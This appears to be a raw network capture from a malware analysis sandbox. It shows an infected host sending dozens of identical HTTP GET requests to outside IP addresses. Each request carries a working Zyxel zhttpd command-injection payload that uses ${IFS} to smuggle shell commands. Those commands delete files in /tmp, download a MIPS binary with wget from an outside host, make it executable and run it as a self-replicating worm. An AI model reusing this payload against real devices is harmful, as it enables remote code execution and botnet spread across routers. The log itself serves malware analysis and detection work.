                                    Jan 13, 2024 19:02:27.008690119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2641192.168.2.135586273.112.79.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008748055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2642192.168.2.1332974152.51.103.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008804083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2643192.168.2.1344168177.219.245.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008861065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2644192.168.2.1342070163.50.48.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008908033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2645192.168.2.1342402173.217.107.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.008960962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2646192.168.2.1356780153.55.128.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009036064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2647192.168.2.1344574202.224.243.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009080887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2648192.168.2.1341444200.148.89.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009119987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2649192.168.2.134540091.123.49.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009191990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2650192.168.2.1339652219.140.4.241443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009262085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2651192.168.2.1339078107.87.127.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009321928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2652192.168.2.1335012211.40.180.225443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009399891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2653192.168.2.1343434146.3.250.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009462118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2654192.168.2.1341718210.239.86.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009494066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2655192.168.2.1356934119.204.100.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009558916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2656192.168.2.136092668.249.68.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009620905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2657192.168.2.133371031.191.59.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009691954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2658192.168.2.135607853.48.28.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009763002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2659192.168.2.134875267.187.228.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009844065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2660192.168.2.1359216107.107.17.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009929895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2661192.168.2.135157214.88.159.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.009978056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2662192.168.2.135932012.223.26.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010061979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2663192.168.2.1343876193.145.38.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010092974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2664192.168.2.1332840105.76.10.97443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010171890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2665192.168.2.135202058.124.213.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010214090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2666192.168.2.1357250157.134.107.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010261059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2667192.168.2.1334102166.159.141.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010309935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2668192.168.2.135280635.66.81.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010358095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2669192.168.2.135007232.111.194.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010443926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2670192.168.2.1333372168.15.219.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010520935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2671192.168.2.1338904223.240.253.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010572910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2672192.168.2.135441066.130.103.98443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010612965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2673192.168.2.135615476.157.188.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010672092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2674192.168.2.1358860129.110.171.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010715961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2675192.168.2.133717266.244.161.228443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010782003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2676192.168.2.133792467.189.103.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010852098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2677192.168.2.1339380221.58.21.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010948896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2678192.168.2.1335120123.76.208.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.010982990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2679192.168.2.1351670119.116.172.61443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011015892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2680192.168.2.1337842143.179.2.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011080027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2681192.168.2.1352814219.74.239.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011135101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2682192.168.2.135259288.253.94.118443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011207104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2683192.168.2.1349394142.221.141.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011248112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2684192.168.2.134152439.124.117.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011315107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2685192.168.2.1336532126.24.48.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011372089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2686192.168.2.135064624.135.59.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011403084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2687192.168.2.1339888123.65.41.34443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011478901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2688192.168.2.1345824218.128.111.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011569023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2689192.168.2.1337614174.189.214.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011615038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2690192.168.2.1349602171.96.109.44443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011667013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2691192.168.2.1359540119.98.125.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011709929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2692192.168.2.136033817.191.54.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011739016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2693192.168.2.135295032.214.0.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011792898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2694192.168.2.1338054119.153.49.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011841059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2695192.168.2.1343788207.219.140.49443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.011945963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2696192.168.2.1356076162.67.51.89443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012027025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2697192.168.2.135248691.242.149.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012088060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2698192.168.2.135383866.30.125.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012115002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2699192.168.2.1341998145.179.143.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012203932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2700192.168.2.134647079.68.204.103443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012263060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2701192.168.2.1351364122.115.179.177443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012300014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2702192.168.2.1355786212.142.21.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:27.012401104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    2703192.168.2.1344584146.3.130.145443
                                    TimestampBytes transferredDirectionData
